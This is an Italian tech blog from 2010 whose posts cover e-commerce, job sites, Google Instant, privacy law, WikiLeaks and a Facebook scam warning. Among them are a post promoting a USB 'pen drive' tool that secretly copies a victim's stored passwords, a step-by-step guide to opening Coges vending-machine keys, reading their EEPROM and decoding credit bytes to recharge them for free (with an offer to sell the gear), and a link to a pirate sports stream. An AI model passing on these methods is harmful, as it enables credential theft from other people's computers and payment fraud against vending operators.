12 dicembre 2010

Nasce Blomming, il mercato ai tempi di Internet !


Blomming è un sistema per portare l'e-commerce su social media, siti e blog. Si basa su una piattaforma embeddable per il webche funziona come i video di YouTube: ci si iscrive e si inseriscono i prodotti con titolo, foto, prezzo e ulteriori informazioni. Viene generato automaticamente un codice HTML di embed che si può copiare e incollare nel proprio sito o si possono selezionare i social network a cui si è iscritti in modo da poter vendere istantaneamente tramite ognuno di questi canali. L’utente, navigando sul profilo del venditore, può attivare un carrello e acquistare attraverso Paypal, bonifico o contrassegno. Infine il venditore, una volta completata la transazione, si occuperà della spedizione e potrà gestire l’ordine e la comunicazione con l’acquirente.

Uno Storefront propone selezioni tematiche di prodotti, da articoli provenienti dalla “coda lunga” a oggetti di design, fino a soluzioni di e-commerce basate su un nuovo approccio: non "portali" tradizionali ma siti che aggregano, intorno ad un brand, prodotti gestiti e venduti da terzi.
-Angelo Corsi

15 ottobre 2010

Come Rubare tutte le Password di un Computer con Lupen Pen Drive


Con Lupen Pen Drive potrete rubare tutte le password di MSN Messenger, le password di Facebook, di Twitter, quelle della posta elettronica, quelle memorizzate nei Browser e simili… per fare ciò vi basterà scompattare la cartella Lupen-Pen-Drive.zip nella vostra chiavetta USB e lanciare il file eseguibile Lupen-Pen-Drive.bat.
Lupen Pen Drive sfrutta tutte le utility di Nirsoft.net e quindi grazie ad esse in pochi secondi tutte le password del computer della vittima verranno copiate in file .html con lo stesso nome delle utilty utilizzate.

LINK PER SCARICARE IL SOFTWARE:
DOWNLOAD

questo post è stato creato solo per farvi salvare tutte le vostre password, in caso ve ne dimentichiate qualcuna ;-)
Angelo Corsi

15 settembre 2010

COME CERCARE LAVORO...Infojob.it trovare lavoro non è stato mai così facile...


InfoJobs.it è la società di recruitment online leader in Italia e in Europa per traffico Internet, numero di offerte e curricula in banca dati. Online in Italia da luglio 2004, ha rapidamente raggiunto la leadership tra i siti specializzati nella ricerca di lavoro con 981.000 visitatori unici, tempo medio di permanenza sul sito superiore ai 10 minuti e oltre 27,5 milioni di page views. InfoJobs.it ha raggiunto il traguardo dei due milioni di candidati e conta più di 30.000 aziende inserzioniste.

Angelo Corsi

13 settembre 2010

COME OTTENERE ASSISTENZA EBAY 24 ORE SU 24


Per chi non lo sapesse, si può andare nel sito americano per l'assistenza eBay dove si possono permettere un'assistenza (a differenza di eBay Italia) live chat 24 ore su 24 !!
Si puo' risolvere un problema in 10 minuti, se si mastica un po' di inglese o magari ci si può aiutare con google translator, magari aprendo una pagina per inglese/italiano e un'altra pagina con italiano/inglese e comunicare cio' che ti chiede il gentilissimo operatore via chat.

Purtroppo, eBay italia ha cercato di rendere sempre più difficile il contatto con gli utenti , cercando di forzare acquirenti e venditori ad avvalersi sempre di più sul sistema automatizzato di aiuto e risposte. È possibile,comunque contattare Ebay.com in diversi modi :

Raggiungere Direttamente eBay

Per e-mail. Per e-mail di assistenza clienti di eBay direttamente, utilizzare questo modulo . Nota che devi firmare prima di essere in grado di immettere il messaggio che la risposta sarà consegnato all'indirizzo e-mail che hai sul file su eBay, e che potrebbe richiedere più tempo di ricevere una risposta in questo modo,oppure scrivere su questo modulo Safe Harbor Team.
Con la chat live. Se si preferisce assistenza con un rappresentante di eBay in tempo reale, è possibile utilizzare anche il sistema di chat dal vivo di eBay. Anche se i collegamenti al sistema di chat sono state rimosse dalla maggior parte delle pagine di eBay, è ancora possibile raggiungere live chat direttamente .

Per telefono. Forse il benvenuto metodo più per contattare eBay per molti è contatto telefonico diretto. Anche se non è molto pubblicizzato sulle pagine di eBay, è possibile raggiungere eBay servizio clienti in qualsiasi momento chiamando il numero 1-800-701-EBAY (1-800-701-3229). Purtroppo, avrete bisogno di un codice PIN per superare il sistema di posta vocale, ma è possibile ottenere uno by visitando la pagina eBay contatto argomenti , facendo clic su "Composizione e Account", quindi "Registrazione" e infine "Sto avendo problemi di registrazione ". Dopo questo ti verrà mostrato un "Call" pulsante eBay. Fare clic su di esso per ricevere il PIN per ottenere l'accesso.

Angelo Corsi

8 settembre 2010

E' arrivato il momento della rivoluzione della ricerca ! Google Instant : da oggi si risparmiano 111 anni al giorno !


Trovare informazioni su Google da oggi sara' ancora piu' immediato e 'intelligente' grazie a Instant, una nuova infrastruttura tecnologica che permette di risparmiare dai 2 ai 5 secondi di tempo per ogni ricerca. Il tutto grazie a un nuovo meccanismo che 'prevede' in anticipo cosa l'utente sta cercando.

Tradotto a livello globale, significa che per ogni secondo speso su Google il nuovo sistema permette di far risparmiare 11 ore di tempo agli utenti di tutto il mondo, o 111 anni per ogni giorno che passa. La tecnologia, presentata oggi in California, consiste in una nuova interfaccia per il motore di ricerca piu' utilizzato al mondo e di un nuovo algoritmo che 'indovina' in anticipo le ricerche degli utenti, proprio mentre questi stanno digitando quello che cercano: un vero e proprio sistema intelligente, che apre la strada a un nuovo modo di cercare informazioni su internet.

Il meccanismo e' diverso da quello di Google Suggest (oggi rinominato 'funzione di completamento automatico'), che era stato progettato per suggerire, durante la ricerca, i termini piu' ricercati dagli altri utenti e che, secondo Google, consentiva gia' ''di ridurre di circa il 50% il tempo necessario per effettuare una ricerca''. Diverse le novita' introdotte con Instant: da oggi non e' piu' necessario finire di scrivere il termine di ricerca o premere il tasto invio per accedere ai risultati. Inoltre, i risultati piu' rilevanti sono visualizzati in modo dinamico mentre si digita la parola, cosi' da poter interagire e cliccare ancor piu' rapidamente sul contenuto web d'interesse. Infine, sara' possibile scorrere con il cursore lungo i suggerimenti evidenziati dal sistema, e visualizzare parallelamente i singoli risultati di ricerca.

Il colosso di Mountain View stima che ''per ogni ricerca media, ora Google mostrera' da 5 a 7 volte piu' risultati rispetto a prima ed e' evidente quindi come Instant rappresenti un'importante sfida per la tecnologia e l'infrastruttura alla base del nostro motore di ricerca. Riuscire ad anticipare le ricerche consente anche di prevedere i risultati ma, prima di poter rendere tutto questo una realta', il team di Google ha dovuto affrontare una serie di sfide tecniche e di design''. Il sistema e' disponibile a partire da oggi per tutti sul sito www.google.com (in lingua inglese), e a tutti gli utenti con un account di Francia, Spagna, Italia e Regno Unito. A breve, Instant sara' reso disponibile anche agli utenti russi.



Angelo Corsi

7 settembre 2010

Reati penalmente punibili, in termini di Internet e privacy,facebook...


Tra i reati penalmente punibili, in termini di Internet e privacy, ricordiamo:

La violazione, sottrazione e soppressione di corrispondenza informatica.
La rivelazione del contenuto di corrispondenza telematica.
L’intercettazione di comunicazioni informatiche o telematiche.
Installazioni abusive di apparecchiature per le intercettazioni informatiche.
La falsificazione, alterazione e sottrazione di comunicazioni informatiche.
Rilevazione del contenuto di documenti informatici segreti.
L’accesso non autorizzato ad un sito.
Lo spionaggio informatico.
In un complesso iter di innovazione legislativo, risulta sicuramente basilare la promulgazione della legge 547/1993 che introduce, tra gli altri, l’importantissimo concetto di frode informatica definita dall’art. 10 all’art. 640ter c.p. secondo cui:

“chiunque, alterando in qualsiasi modo il funzionamento di un sistema informatico o telematico o intervenendo senza diritto con qualsiasi modalità su dati, informazioni o programmi contenuti in un sistema informatico o telematico o ad esso pertinenti, procura a se o ad altri un ingiusto profitto con altrui danno, è punito con la reclusione da sei mesi a tre anni e con la multa da euro 516 a euro 1032. La pena è della reclusione da uno a cinque anni e della multa da euro 309 a euro 1549 se ricorre una delle circostanze previste dal n.1 del secondo comma dell’art. 640 ovvero se il fatto è commesso con abuso della qualità di operatore del sistema.
Estremamente rilevante risulta anche la già citata legge 675/1996 che, sebbene non si occupi in modo specifico del contesto informatico, ricopre un ruolo fondamentale per ciò che concerne il trattamento e la protezione dei dati personali.

Dal 1° gennaio 2004 è inoltre in vigore il decreto legislativo n. 196 che ha puntato l’attenzione su tematiche importanti come le modalità con cui devono essere trattati i dati confidenziali nell’ambito dei servizi di comunicazione elettronica accessibili al pubblico e l’obbligo, da parte dei fornitori, di rendere l’utente più consapevole su come le loro informazioni riservate verranno trattate e utilizzate.

Il Garante della privacy afferma che la posta elettronica deve avere la stessa tutela di quella ordinaria. Anche se la rete consente una vasta conoscibilità degli indirizzi di posta elettronica, è considerato illegale l'uso di questi dati personali per scopi diversi da quelli per cui sono presenti on-line (compreso l'invio di messaggi a scopo commerciale, pubblicitario...). È quindi obbligatorio, per non violare la privacy degli utenti, accertarsi del loro consenso prima di utilizzare il loro indirizzo e-mail per qualsiasi scopo.
Angelo Corsi

4 settembre 2010

Internet, ultimi giorni di libertà..Li seppelliremo tutti con un clic !



L'Italia va così verso la Cina, mentre parte anche la schedatura delle web tv.
Cala il sipario sul web, uno degli ultimi spazi disponibili per fare circolare liberamente le idee. Il comma 29 dell'articolo 1 della legge bavaglio impone che ogni sito, blog, forum, pagina Facebook, canale YouTube, debba sottostare all'obbligo di rettifica previsto per le testate giornalistiche. Si rischiano multe fino a 12mila euro. Nel frattempo l'Autorità garante per le Comunicazioni ha pubblicato gli schemi dei regolamenti in ossequio al Decreto Romani. D'ora in poi le web tv ed i video blogger italiani dovranno chiedere all’Agcom un’autorizzazione per andare online e versare 3000 euro per l'iscrizione. Mentre nel mondo sempre più paesi guardano con lungimiranza alla rete, in Italia procede a tappe forzate il progetto per controllare il web e per zittire le tante voci contro il palazzo che popolano Internet.

C’è un disegno nel Palazzo che ha per obiettivo quello di imbavagliare anche l’informazione libera online e consegnare la Rete nelle mani dei Signori dell’informazione di un tempo perché la utilizzino come una grande TV.
Il Cavaliere si accinge a sbarcare in Rete avendone forse, almeno, subodorato le enormi potenzialità, la vuole tutta per lui, per i suoi amici e per i soli suoi nemici che ha, comunque, la garanzia di poter controllare almeno in termini economici.


Non mi dispiace dirlo..ma in rete l’opposizione siamo noi !!
e li seppelliremo tutti con un clic !
Angelo Corsi

27 agosto 2010

Wikileaks: 400 mila documenti sull'orrore. In Iraq 109.000 vittime


Wikileaks (da leak, "fuga di notizie" in inglese) è un'organizzazione internazionale che riceve documenti coperti da segreto e poi li mette in rete sul proprio sito web. Wikileaks riceve, in genere, documenti di carattere governativo o aziendale da fonti coperte dall'anonimato. L'organizzazione si occupa di verificare l'autenticità del materiale e poi lo pubblica tramite i propri server dislocati in Belgio e Svezia (due Paesi con leggi che proteggono tale attività), preservando l'anonimato degli informatori e di tutti coloro che sono implicati nella "fuga di notizie".
Wikileaks vuole essere "una versione irrintracciabile di Wikipedia che consenta la pubblicazione e l'analisi di massa di documentazione riservata". Lo scopo ultimo è quello della trasparenza da parte dei governi quale garanzia di giustizia, di etica, di una più forte democrazia.
Il sito è curato da giornalisti, attivisti, dissidenti del governo cinese, scienziati; i suoi obiettivi primari sono le nazioni dell'ex Unione Sovietica, dell'Africa sub-sahariana e del Medio Oriente. Comunque i cittadini di ogni parte del mondo possono e sono invitati ad inviare materiale "che porti alla luce comportamenti non etici di governi e aziende".
Gran parte dello staff del sito, come gli stessi fondatori del progetto, rimangono per ora anonimi.
Il sito adopera una versione modificata del software MediaWiki, lo stesso software in uso anche sui server di Wikipedia. Ad un anno dal suo lancio, avvenuto nel dicembre 2006, il suo database contava oltre un milione di documenti. Wikileaks è ospitato da PRQ, un Internet service provider svedese.

http://www.wikileaks.org

Angelo Corsi

8 agosto 2010

COME NAVIGARE IN INCOGNITO SENZA LASCIARE TRACCE


Se desideri navigare nel Web in incognito, ad esempio se intendi sorprendere qualcuno con regali o in occasione di compleanni, Google Chrome ti offre la possibilità di utilizzare la modalità di navigazione in incognito. Ecco come funziona la modalità di navigazione in incognito:
Le pagine web aperte e i file scaricati in modalità di navigazione in incognito non vengono registrati nelle cronologie di navigazione e di download.
Tutti i nuovi cookie vengono eliminati dopo avere chiuso tutte le finestre di navigazione in incognito aperte.
Le modifiche apportate ai Preferiti e alle impostazioni generali di Google Chrome in modalità di navigazione in incognito vengono sempre salvate.

Attivazione della modalità di navigazione in incognito

Istruzioni per Windows e Linux

Scorciatoia da tastiera: Ctrl+Maiusc+N

Fai clic sul menu Strumenti .
Seleziona Nuova finestra di navigazione in incognito.
Istruzioni per Mac

Scorciatoia da tastiera: ⌘-Maiuscole-N

Seleziona Archivio > Nuova finestra di navigazione in incognito sulla barra dei menu. Puoi anche fare clic sul menu Pagina se è visualizzato sulla barra degli strumenti e selezionare Nuova finestra di navigazione in incognito.

Verrà aperta una nuova finestra con l'icona nell'angolo. Puoi continuare a navigare normalmente nell'altra finestra. Puoi anche fare clic con il pulsante destro del mouse (oppure, su Mac, premere Control e fare clic) su un link e selezionare Apri link in finestra di navigazione in incognito.


Angelo Corsi

PanicButton : COME NASCONDERE PAGINE INTERNET ISTANTANEAMENTE CLICCANDO SU UN BOTTONE


PanicButton rende più facile nascondere tutte le tue schede istantaneamente cliccando su un bottone. Le schede verranno salvate come segnalibri in una cartella separata. Fatto ciò il PanicButton diventerà verde e mostrerà quante schede sono attualmente nascoste.
Un ulteriore click sul PanicButton recupererà tutte le schede nascoste precedentemente.
Se non vuoi recuperare le schede, cancella semplicemente la cartella "temporary Panic" nella cartella "Altri segnalibri" di Chrome.
Puoi anche usare una scorciatoia da tastiera per PanicButton. Premi ESC per nascondere e recuperare tutte le tue schede. (attualmente funziona solamente su pagine con protocollo http://)

Per l'installazione bisogna utilizzare Google Chrome clicca quì
Condividi Il Post
Bookmark and Share
------------Angelo Corsi

17 maggio 2010

GUIDA PER L'HACK DELLA CHIAVETTA COGES PER PRENDERSI IL CAFFE' GRATIS...





Le chiavi Coges a frequenza possono essere modificate intervenendo
manualmente nella chiave( operazione di media difficoltà perchè
l'interno è resinato). La procedura d'intervento è la seguente:
togliere la copertura colorata, con un taglierino sottile e molto
affilato staccare il contenuto resinato , una volta tolto si presenta
come un quadratino di cioccolato di colore nero o marrone. Montando
una piccola fresetta di diametro 2 su un trapanino ad alta velocità
aquistabilie nei negozi di bricolage è possibile con estrema
delicatezza e attenzione asportare la resina che avvolge l'intero
circuito. L'obbiettivo è quello di raggiungere la EPROM, che può
essere letta e scritta con il progammatore MULTIPIPPO abbinato al
software IC PROG v. 1.04, la sigla della Eprom è (24C02) che sarà da
selezionare nell' IC PROG. I fili che vanno saldati alla eprom sono 4
e i rispettivi pin sono 8,6,5,3 di cui l' estremità opposte verranno
connesse sullo zoccolo della eprom del MULTIPIPPO rispettando la
piedinatura descritta sopra (8,6,5,3).
Per togliere la resina Marrone Ruggine puoi utilizzare un tronchesino
da Radiotecnico. Inoltre volevo rassicurare che la procedura da me
descritta è PERFETTAMENTE funzionante .
La resina deve essere asportata solo sul lato interessato che è la
parte adiacente alla copertura colorata. La profondita di asportazione
rispetto la sua lunghezza non supera gli 8mm. Li sotto c'è la nostra
EPROM.
****
Allora:
1) Mi son fatto prestare la "Fresatrice" e ho raggiunto l'EEPROM
XxxxxxX
[]xxxxx[] <--resistenza br="">[]xxxxx[]
XxxxxxX
Xxxxx[E] <--eeprom a="" basso="" br="" destra="" in="">Con questo misero schemino almeno non scaverete a vuoto
tutto il "Cubetto"
2) Ho collegato :3,5,6,7,8 [ Cotton!!! Senza il Pin7 non va ]
5678
++++ Il puntino indica il Pin 1) a volte c'è una fascetta
|xxxx| la quale serve a capire quale è il piedino 1).
|°xxx|
++++
1234
Ho scelto [24C02] La più piccina
****
1) Monocolo da Orefice
2) Saldatore 12V [Weller]
3) Stagno a lega Bassofondente [Il male trovarlo]
Occorrente per riuscire ad avere un PCB parzialmente pulito :
- Cacciavite a lama con punta da 4×0.5mm circa
- Cacciavite a lama con punta da 3mm fine e bella affilata
- Vite X metalli da 3×20mm a testa e punta piatta
- Vite X metalli da 3×60mm a testa e punta piatta
- Una Morsa da banco
- Attrezzi per la manicure
- 33cc di solvente (Cloroformio, Trielina, Acetone, Sverniciatore
sembrano
essere i piu' utili, ma anche la salamoia del Giudice Morton di Roger
Rabbit
ha un suo perche')
- Un vasetto di vetro da marmellata da 250gg ai mirtilli Equo-Solidale
(non era meglio Equino-Solidale ? NdCava )
- 2 Bei maroni grossi
- 72 ore di tempo, di cui almeno 1h da dedicare al lavoro per farlo
bene
[E] Versate il solvente nel vasetto di vetro, ne basta un dito (ottima
unita'
di misura vero?) (Nel tuo caso sono meglio due di dita, indovina dove...
NdCava) ci sbattete dentro il blocco PCB-resina e chiudete il tappo in
modo
che non vi intossicate durante la notte, visto che i solventi
evaporano bene.
Se usate il cloroformio abbiate cura di non svenirmi sul vasetto,
oppure
di ammazzarvi lasciando il vasetto sul comodino, grazie!. Mettete il
vasetto all'aperto, magari fuori dalla finestra, ma lontano dalla luce
solare, perche' altrimenti invece del solvente trovate un liquido che
dopo 20
ore di irradiazione e' diventato qualcos'altro (La Salamoia di cui
sopra?
NdCava) Attendete almeno n ore. (come sei preciso... NdCava)
[f] Ora aprite il vasetto, estraete il blocco PCB-resina e dovreste
vedere
che la resina almeno all'esterno e' diventata piu' morbida: togliete
con un
attrezzo da manicure tutto quello che potete nella zona EEPROM senza
togliere
nulla nella zona delle induttanze, anche perche' sono coperte di
plastica
(oltre che mascherate da resistenze) e come il resto della resina si
fondono,
se si dovesse fondere anche la vernice isolante attorno alle spire...
... Ciao Ciao chiave!
[G] Se tutto e' andato bene ora avete il PCB bello pulito come nella
jpeg che
vi abbiamo allegato con la EEPROM, bello scoperto e adatto a farci una
saldatura per un connettore.
Come dobbiamo fare? Riguardiamo un attimino il pinout della EEPROM
24LC02,
notate che ci sono 8 piedini, gia' vi dico che i piedini 1,2,3 (chip
select
per utilizzo di eeprom in serie), 4 (Vss) e 7 (hardware wp) sono
completamente
in corto.
Potete quindi tranquillamente sfruttare solamente i piedini:
8 (Vcc)
7 (WriteProtect) (che va a massa con gli altri 4)
6 (Clock)
5 (Data I/O)
per fare tutto quello che volete.
Se avete seguito i dettami del mio compare, dovresti aver ottenuto una
chiave
pulita, con i contatti della eeprom scoperti e magari con anche un bel
connettore per accedere con facilita' ai pin. Ok direte, ma come
collego tale
chiave al PC?
La cosa e' molto semplice : usate un Multipipo.
La faro' breve, visto che molti di voi conosceranno gia' tale
interfaccia
(dato che e' molto diffusa tra chi "opera" nel settore satellitare).
In sostanza si tratta di un programmatore su porta seriale che
permette
di programmare PIC (tipicamente 16f84 e 16f876) e EEPROM (tipicamente
24lc16, 24lc32, 24lc64 e superiori). In realta', con tale interfaccia,
e'
possibile operare anche con le piccole 24lc01 e 02 presenti nelle
chiavi
COGES, quindi siamo a cavallo!
L'unico sbattimento e' far combaciare i pin dell'eeprom con quelli del
socket
relativo sul programmatore, ed e' infatti per questo che vi
consigliamo di
costruirvi un connettore sulla chiave e un cavetto per semplificare le
operazioni.
Tralascio di entrare nel dettaglio su come usare questo programmatore,
(e
sull'utilizzo dei software specifici). Vi consiglio comunque :
-IcProg sotto Windows (www.ic-prog.com)
PS: ricordatevi di attivare sotto Options->I2C l'opzione "Enable MCLR
as Vcc"
-Pic24c13 (ovvero Willem's Pic Programmer sotto DOS
Ovviamente in entrambi i software e' necessario selezionare la porta
COM
corretta, il tipo di interfaccia utilizzata (Ludipipo per Pic24c13 e
JDM Programmer per IcProg) e il tipo di EEPROM (24lc02).
I 3 byte hanno questa "progressione" (tenete conto che i dump sono di
tre
operazioni progressive):
00B: C9 -> CA -> CB
018: D0 -> CF -> CE
01B: C9 -> CA -> CB
Sembra quindi che i byte 00B e 01B siano i contatori del numero di
operazioni
effettuate di cui si parla sul sito, mentre l'altro byte che decresce
puo'
essere un contatore di numero di operazioni restanti (ovviamente non
abbiamo
conferma di questo, sono solo delle supposizioni)
Focalizziamoci ora sulle matrice 4×4:
1.40 Euro 1.06 Euro 0.62 Euro
=========== =========== ===========
82 80 43 C0 81 82 82 C2 80 83 83 82
82 83 02 00 82 40 C3 C0 81 82 02 C2
82 40 43 C0 81 42 82 C2 80 43 83 82
82 43 02 00 82 00 C3 C0 81 42 02 C2
Notate qualcosa di interessante?
Innanzi tutto, ecco cosa ho dedotto osservando quei dati:
- i byte iniziano sempre per 0,4,8 o C
- la prima riga e la terza differiscono di 40H sul 2ndo byte (*)
- la seconda riga e la quarta differiscono di 40H sul 2ndo byte (*)
- i byte finiscono sempre per 0,1,2 e 3 (+)
(*) questo schema e' ripetuto anche in altri punti della eeprom
(+) poi smentito da dump successivi, vedi dopo..
Dato che la chiave memorizza sia il credito attuale che quello
precedente,
viene da pensare che quelle quattro righe siano in realta' il credito
attuale
e quello precedente copiati due volte, per backup.
Questa ipotesi e' suffragata anche dal fatto che a seguito di alcuni
errori
nelle operazioni con i distributori si e' comunque in grado di
recuperare
il credito corretto nella chiave.
Ok quindi ci interessiamo solo delle prime due righe:
1.40 Euro
===========
82 80 43 C0
82 83 02 00
Aggiungiamo l'ennesima premessa, sparando a caso, diciamo che la prima
riga
e' il credito attuale e la seconda e' quello precedente (che tra
l'altro
non sappiamo, essendo 1.40 il primo dump disponibile e visto che non
ci
ricordiamo cosa e' stato comprato con la chiavetta prima dell'1.40,
i soliti smemorati...)
a questo punto come collegare 1.40 euro a 82 80 43 C0 ?
1.40 Euro -> 1.06 Euro -> 0.62 Euro
=========== =========== ===========
82 80 43 C0 81 82 82 C2 80 83 83 82
82 83 02 00 82 40 C3 C0 81 82 02 C2
Osservando i tre dump, si puo' osservare una cosa interessante, ovvero
che i
LN del credito passano da un dump all'altro nel processo di
"invecchiamento
del credito" senza cambiare:
Infatti 82 80 43 C0 credito attuale nel primo dump
diventa 82 40 C3 C0 credito vecchio nel secondo dump.
Inoltre 81 82 82 C2 credito attuale nel secondo dump
diventa 81 82 02 C2 credito vecchio nel terzo dump.
ED ECCO CHE AVRETE UN CHIAVETTA RICARICATA!!!!!!!
PER INFO SULL'ACQUISTO DEL PROGRAMMATORE E DEL SOFTWARE...CONTATTATEMI !

Condividi Il Post
Bookmark and Share
------------Angelo Corsi

27 aprile 2010

CAMPIONATO,CHAMPIONS LEAGUE,FORMULA 1 : C'è CHI GUARDA LA PAY TV SENZA PAGARE ...VI SPIEGO COME !


La storia delle partite di calcio gratuite su Internet ha subito negli ultimi tempi,una veloce evoluzione.Agli albori,il massimo dell'offerta era garantita da video di bassa qualità con telecronache il lingue incomprensibili e attraverso link difficili da reperire.Esistono molti portali tipo Justine,ustream,freedocast,ma hanno iniziato a limitare la trasmissione di materiale protetto da diritto d'autore.MA L'EVOLUZIONE è INARRESTABILE E ADESSO A RIPORTARE IL SORRISO AGLI STREMMONI E SCROCCONI :-) ARRIVA VSHARE.
VSHARE è un servizio on-line utile per guardare e condividere calcio e altri sport GRATIS !!

LINK VSHARE.TV

Condividi Il Post
Bookmark and Share
------------Angelo Corsi

8 marzo 2010

ARRIVA TANGON.IT L'ACQUISTO DI GRUPPO CHE Fà RISPARMIARE....


Solo la Rete poteva rendere possibile il diffondersi di un fenomeno cinese come quello del modello dell’acquisto di gruppo conosciuto come Tuangou. Questo sistema consente ad un gruppo di consumatori interessati ad il medesimo oggetto o attività di unirsi per poter ottenere un consistente risparmio, stimato intorno al 50%, da parte del venditore.



Con l’avvento della crisi economica e l’espandersi della tecnologia di massa attraverso la Rete, questo fenomeno è giunto anche in Occidente, prima negli Stati Uniti con un sito di gruppi d’acquisto chiamato GroupOn ed ora anche in Italia, con il sito www.taungon.it. Ad importare nel nostro paese questa innovativa concezione di risparmio è stato Riccardo Albini, giornalista e imprenditore milanese, già arguto inventore del Fantacalcio e fautore del fenomeno Sudoko in Italia. Quando ha scoperto il sito americano, che in un solo anno ha avuto oltre due milioni di iscritti, Albini ha pensato di portare anche in Italia un sistema di questo tipo.

Da oggi, il sito TuangOn.it comincerà ad inviare, alle persone iscritte alla mailing list, le proposte relative ai diversi servizi commerciali scontati della propria città. Il prezzo sarà scontato solo a fronte del raggiungimento di un determinato numero minimo di adesioni, raccolte entro le 24 ore. Per ora le offerte riguarderanno soprattutto il tempo libero, con proposte che vanno dagli eventi sportivi ai corsi in palestra, dal cinema ai ristoranti.

Nel caso in cui l’offerta ricevuta fosse interessante per l’acquirente, questo non dovrà fare altro che procedere all’acquisto ed attendere che il numero di adesioni venga raggiunto. E’ a questo punto che la Rete, ed in particolare i Social Network, possono costituire un fattore determinante. Basta infatti mandare l’offerta ad amici e conoscenti attraverso le pagine del proprio Social Network di riferimento per riuscire ad aumentare il numero di partecipanti e magari contribuire a raggiungere la soglia minima di adesioni. Se questa non dovesse essere raggiunta l’acquisto non si concretizzerà. In caso contrario arriverà nella casella di posta un coupon da utilizzare per l’acquisto.L’obiettivo di TuangOn è quello di ottenere una riduzione del 50% rispetto ai prezzi consueti. Un risparmio molto allettante in un periodo come questo che potrebbe trasformare l’intuizione di Albini in un vero e proprio fenomeno.

Il servizio di TuangOn per ora sarà disponibile solo su Milano ma presto raggiungerà anche Roma, Genova, Firenze, Bologna, Torino e Napoli.
Condividi Il Post

Bookmark and Share

------------
Angelo Corsi

4 marzo 2010

Skinput, un touch screen di pelle umana...


E' in sviluppo presso la Carnegie Mellon University in collaborazione con Microsoft. E vuole portare gli schermi touch sulle braccia e sulle mani degli utenti.
L'era dei cyborg sembra essere oramai una realtà. Alcuni ricercatori americani della Carnegie Mellon University di Pittsburgh in collaborazione con Microsoft a Redmond, stanno infatti lavorando a Skinput, il touch screen sul corpo umano. Il neologismo che unisce le due parole skin (pelle) a Input, permette di usare la propria pelle come la tastiera di un telefonino o come il comando di un videogioco.

I tre scienziati Chris Harrison (Carnegie Mellon University), Dan Morris e Desney Tan (Microsoft), sono partiti creando un vero e proprio elenco di suoni prodotti dall'avambraccio, determinato grazie alle diverse combinazioni di pelle, muscoli e ossa. Skinput non è altro che l'unione di due tecnologie: le basse frequenze di suono prodotte dal 'tocco' di un dito sulla pelle e alcuni micro- proiettori disponibili su alcuni tipi di cellulari.

Prima di tutto si proietta sull'avambraccio l'immagine di una tastiera di un telefono. Successivamente un microfono molto sensibile montato su una fascia avvolta al braccio capta la 'digitazione' sulla pelle, riuscendo a capire dove si è verificato il tocco delle dita sulla tastiera. Il tutto è possibile grazie all'abilità di distinguere i diversi suoni che sono a bassissima frequenza, prodotti dal contatto con la pelle.

Il sistema è stato testato su una ventina di volontari, secondo New Scientist, e la maggioranza ha trovato facile navigare tra le icone oltre che digitare sull'avambraccio. I ricercatori sono fiduciosi sulle applicazioni future di Skinput. Secondo loro sarà infatti possibile inviare comandi a telefoni, iPod, ma presto anche ai personal computer.

Condividi Il Post

Bookmark and Share

------------
Angelo Corsi

8 gennaio 2010

Applicazione chi ti visita su Facebook, ENNESIMA BUFALA !


Ecco un’altra applicazione di Facebook che promette di mostrare chi visita il tuo profilo, anche questa però come tutte le pagine e come tutte le altre applicazioni del genere è totalmente fasulla e sfrutta la curiosità, l’interesse e un pò di disattenzione, per non dire “ignoranza” delle persone e degli utenti.

Questa applicazione non fa altro che guidarvi in un paio di passi per poi farvi arrivare a condividerla sulla vostra bacheca con un messaggio fasullo e diffondendola quindi in modo virale tramite il passaparola tra amici.

L’applicazione è questa e si chiama “C O U N T E R”:
http://apps.facebook.com/abwgthbmqbz/?_fb_fromhash=1abf5188ad3adc9453935d78af98f45f&ref=nf

Il primo passo vi dicono che gli aggiornamenti dei visitatori sono bloccati e che per sbloccarli dovete cliccare sul link che vi propongono, vi mettono anche una pagina fasulla che riassume dei dati fasulli su possibili visite dei vostri amici non cascateci.


Se cliccate sul link di sblocco verrete mandati ad una seconda pagina che in automatico vi aprirà la finestrella per condividere sulla vostra bacheca l’uso dell’applicazione con integrato già il messaggio “Questa funziona alla grande! Finalmente!”, così che fregano voi e fregano i vostri amici, che pensando l’abbiate scritto voi quel messaggio, crederanno e utilizzeranno l’applicazione…ecco il trucco per la diffusione con il passaparola!

Evitate di condividerla cliccando su “Skip”, potrete così vedere cosa scrivono nella pagina, vi dicono che perchè l’applicazione venga attivata almeno 15 dei vostri amici dovranno utilizzarla, altra cosa falsissima, non esiste nulla su Facebook che si attiva in base agli inviti di vostri amici…quindi evitate di pubblicare sulla bacheca l’uso dell’applicazione per non fare il loro gioco.

Resta un ultimo collegamento da “utilizzare” (o meglio non utilizzare) per concludere questa fantomatica operazione, se ci cliccate sopra verrete inviati ad un ultima pagina che vi dice, con il solito trucchetto, che se volete ridurre il numero necessario di amici per l’attivazione dovete cliccare sul riquadro rosso.

Il riquadro rosso è una pubblicità che porta introiti a chi ha creato l’applicazione ma a voi non darà nulla di nulla, sono questi i soliti e classici metodi che vengono utilizzati per “rubare” i click degli utenti e farseli pagare da società di affiliazione che pagano ad ogni click una certa tariffa, sistema lecito quello di affiliazione, sistema illecito il modo in cui vengono recuperati i click.

Riassumento, non esiste nulla che conta chi visita il vostro profilo su Facebook, nessuna pagina o applicazione, non esiste nulla su Facebook di nascosco che si attiva se invitate un certo numero di amici, sono tutti metodo ingannevoli per ottenere qualcosa, la diffusione di una applicazione fasulla, il recupero di vostri dati, tutto comunque per scopi “illeciti”, quindi state sempre attenti.
Condividi Il Post

Bookmark and Share

------------
Angelo Corsi

Wikipedia

Risultati di ricerca

POST IN EVIDENZA

Creazione Siti Web Seo Roma

Creazione Siti Web Seo Roma Sei Pronto ad iniziare il tuo Progetto ? Webbo Srls Creazione Siti Web Seo Roma   L'azienda nasce sull'e...

Post più popolari